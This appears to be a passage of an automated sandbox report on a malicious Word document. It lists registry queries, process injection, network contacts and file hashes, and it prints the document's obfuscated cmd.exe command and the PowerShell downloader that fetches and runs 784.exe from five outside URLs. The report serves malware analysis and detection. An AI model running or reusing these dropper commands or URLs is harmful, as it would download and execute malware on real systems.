| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1656 wrote to memory of 3068 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 1656 wrote to memory of 3068 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 3068 wrote to memory of 1556 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3068 wrote to memory of 1556 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e7130a6d0947b1a621c617deab86604_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\cmd.exe
cmd /V/C"^s^et 1^F= ^ ^ ^ ^ ^ ^ ^ ^ ^ }}{hc^tac^}^;kaerb;jc^o^$ ^m^et^I-ekovn^I^;)jco$ ,n^h^d^$(el^iF^dao^lnw^o^D.K^Pp$^{yr^t^{)PzV^$ n^i^ n^h^d$(^hc^a^erof;^'^e^xe.^'+dL^Z^$+'^\^'+ci^l^b^u^p^:vne$=jc^o$^;^'^48^7' = d^L^Z$;)'@'(^til^p^S^.^'5f/^m^oc^.ocd^dag//^:^p^tt^h^@^QJJ6^p/^m^oc.^amo^h^ab//:^p^t^t^h^@Iyt^1/moc^.^l^a^icnani^fn^ergdn^i^l//:ptt^h^@^O/m^oc.ev^i^t^a^erc^in^g^a//^:p^tt^h@o/^k^u^.^oc.rw^am^y^t//^:^pt^t^h^'^=^PzV$^;^tne^ilCbe^W.teN tce^j^bo-^w^en^=^KP^p^$ l^l^ehsr^e^w^op&&^f^or /^L %^9 in (^33^6;-1;^0)d^o s^e^t ^W^1^x^K=!^W^1^x^K!!1^F:~%^9,1!&&^i^f %^9 l^s^s ^1 c^a^l^l %^W^1^x^K:~^6%"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $pPK=new-object Net.WebClient;$VzP='http://tymawr.co.uk/o@http://agnicreative.com/O@http://lindgrenfinancial.com/1tyI@http://bahoma.com/p6JJQ@http://gaddco.com/f5'.Split('@');$ZLd = '784';$ocj=$env:public+'\'+$ZLd+'.exe';foreach($dhn in $VzP){try{$pPK.DownloadFile($dhn, $ocj);Invoke-Item $ocj;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tymawr.co.uk | udp |
| DE | 142.132.181.81:80 | tymawr.co.uk | tcp |
| US | 8.8.8.8:53 | agnicreative.com | udp |
| US | 3.33.130.190:80 | agnicreative.com | tcp |
| US | 8.8.8.8:53 | lindgrenfinancial.com | udp |
| US | 8.8.8.8:53 | 81.181.132.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 104.196.150.112:80 | lindgrenfinancial.com | tcp |
| US | 8.8.8.8:53 | bahoma.com | udp |
| GB | 141.136.43.79:80 | bahoma.com | tcp |
| US | 8.8.8.8:53 | 112.150.196.104.in-addr.arpa | udp |
| GB | 141.136.43.79:443 | bahoma.com | tcp |
| US | 8.8.8.8:53 | gaddco.com | udp |
| US | 15.197.142.173:80 | gaddco.com | tcp |
| US | 8.8.8.8:53 | 79.43.136.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.142.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| SE | 184.31.15.242:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 242.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/1656-1-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-3-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-2-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-0-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-5-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-4-0x00007FF9F744D000-0x00007FF9F744E000-memory.dmp
memory/1656-6-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-8-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-7-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-9-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-10-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-11-0x00007FF9B52C0000-0x00007FF9B52D0000-memory.dmp
memory/1656-13-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-12-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-16-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-19-0x00007FF9B52C0000-0x00007FF9B52D0000-memory.dmp
memory/1656-18-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-20-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-21-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-17-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-15-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-14-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-41-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-40-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-43-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-42-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-39-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1556-49-0x000001B9B3FE0000-0x000001B9B4002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihlcandl.k0b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\784.exe
| MD5 | 02aa1319111fdb2e938807982a044f45 |
| SHA1 | b619828d60dcd0120cefb7cb8eae16cba978175a |
| SHA256 | a4961b8005278cac2bc4cc519d037037cb2d8cabd94c4314676521b0411e5b8f |
| SHA512 | bfc23fe8915334cfdb85a91616394e080fa109d95cebcc8d11671b9c216a0b9c99de6bb8a4725a02fc78209b1fbff420888e023ff6de30db232c6d30ba0b70b6 |
C:\Users\Public\784.exe
| MD5 | e89f75f918dbdcee28604d4e09dd71d7 |
| SHA1 | f9d9055e9878723a12063b47d4a1a5f58c3eb1e9 |
| SHA256 | 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023 |
| SHA512 | 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0 |
C:\Users\Admin\AppData\Local\Temp\TCD8B2F.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |
memory/1656-561-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-562-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-563-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-564-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-565-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-566-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-590-0x00007FF9F73B0000-0x00007FF9F75A5000-memory.dmp
memory/1656-589-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-588-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-586-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp
memory/1656-587-0x00007FF9B7430000-0x00007FF9B7440000-memory.dmp